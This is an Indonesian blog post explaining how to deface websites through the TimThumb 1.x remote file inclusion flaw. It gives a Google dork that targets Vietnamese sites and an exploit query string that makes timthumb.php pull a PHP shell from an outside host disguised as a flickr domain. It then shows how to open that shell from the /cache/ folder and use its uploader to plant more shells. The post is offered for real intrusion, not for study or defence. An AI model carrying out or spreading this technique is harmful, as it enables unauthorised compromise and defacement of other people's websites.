Assalamualaikum broo hehe kembali lagi bersama mimin gans sedunia hehe :V

Yo wis disini gwe bagikan cara deface poc Timthumb 1.xx, ini request dari salah satu pengikut blog ini hehe...

Ok lanjutkan ster :)
Pertama kalian dorking dulu di google image ya!



Dork :
inurl:/timthumb.php site:vn
Kembangkan lagi ya pake otak kalian hehe

Exploit :
?src=http://flickr.com.nauliani.com/shall.php

Exploit diatas yaitu punya teman saya yg bernama Marshall.

Nah setelah dorking diatas kalian coba lihat dulu versi timthumbnya misal :
www.site.com/timthumb.php lihat dibawah :

Gambar diatas menunjukan bahwa web Vulerable atau Vuln hehe :) dan selanjutnya kalian masukan Exploitnya contoh :
www.site.com/timthumb.php?src=http://flickr.com.nauliani.com/shall.php

Nah disini Saatnya Kita panggil Shell kita lihat dibawah :

Nah cara panggil shell kita tinggal ketik
www.site.com/cache/shellnya.php dan bakalan muncul uploadernya! Saatnya kalian upload shell lagi ya hehe cara panggilnya tetap sama kok :V

Dan boom Shellnya Keluar


Ok sekian dari mimin gans sedunia wkwkw selanjutnya tinggal kalian kembangkan aja ya hehe Seeyou